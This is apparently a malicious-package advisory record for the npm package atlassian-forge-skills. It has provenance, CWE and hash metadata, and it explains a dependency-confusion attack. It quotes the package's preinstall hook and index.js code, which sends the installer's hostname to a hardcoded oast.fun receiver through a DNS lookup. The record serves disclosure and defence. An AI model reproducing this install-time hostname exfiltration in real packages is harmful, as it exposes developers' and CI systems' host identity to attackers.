-= Per source details. Do not edit below this line.=-
Package impersonates an internal Atlassian Forge dependency (unscoped name atlassian-forge-skills, description 'Internal package', generic author 'Team'). package.json declares "preinstall": "node index.js", which fires automatically on npm install. index.js lines 6-8 read os.hostname() and embed it as a subdomain of a hardcoded interactsh OAST receiver: const targetDomain = `${hostname}.zcagyqqmvnmgsklstrrr6xo2715tov7wz.oast.fun`; dns.lookup(targetDomain, () => {});. The DNS lookup is sufficient to leak the installer's hostname to the attacker-controlled oast.fun DNS server — the canonical dependency-confusion payload, where any developer or CI pipeline that mistakenly resolves an internal Atlassian package name to this public registry entry exposes host identity for follow-on targeting.
{
"malicious-packages-origins": [
{
"sha256": "0ca0f4b99cda621977551550ed678ad77ee82827714acb9d08534f53b0642e3c",
"source": "amazon-inspector",
"modified_time": "2026-06-16T14:52:14Z",
"versions": [
"29.1.0"
],
"id": "IN-MAL-2026-006753",
"import_time": "2026-06-16T16:06:33.198581429Z"
}
]
}
[
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
}
]
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/atlassian-forge-skills/MAL-2026-5891.json"
{
"evidence_files": [
{
"sha256": "022bbb08b9e9a7dc384de2d058f5cb1b053977a0abdc4db4fa518826c96b4b9b",
"tlsh": "55d05ee503a4a390093162c872329617e723e1673683a9c0b94c92c24fa2a70cd728bc",
"path": "index.js"
},
{
"sha256": "b8f6e49458a479308513366d7578d3a234982ee618f23435d71a691979476fd9",
"tlsh": "e8e02b728d219d2308744bf5483a290ab1928f3f60384c8bf1bb121c61d32608cee308",
"path": "package.json"
}
],
"package_integrity": [
{
"hashes": {
"sha512_sri": "sha512-kppU1UOyFnUbOL9KPGgQoCvSGCh/xMQzhMoqjADJlKfyE3E7p71XTLlyoTAEomfghocgTLXoM0kefb6jK+5fyA==",
"sha1": "34d9108eec5b1768df67557ccfb364006b84a051"
},
"filename": "atlassian-forge-skills-29.1.0.tgz"
}
]
}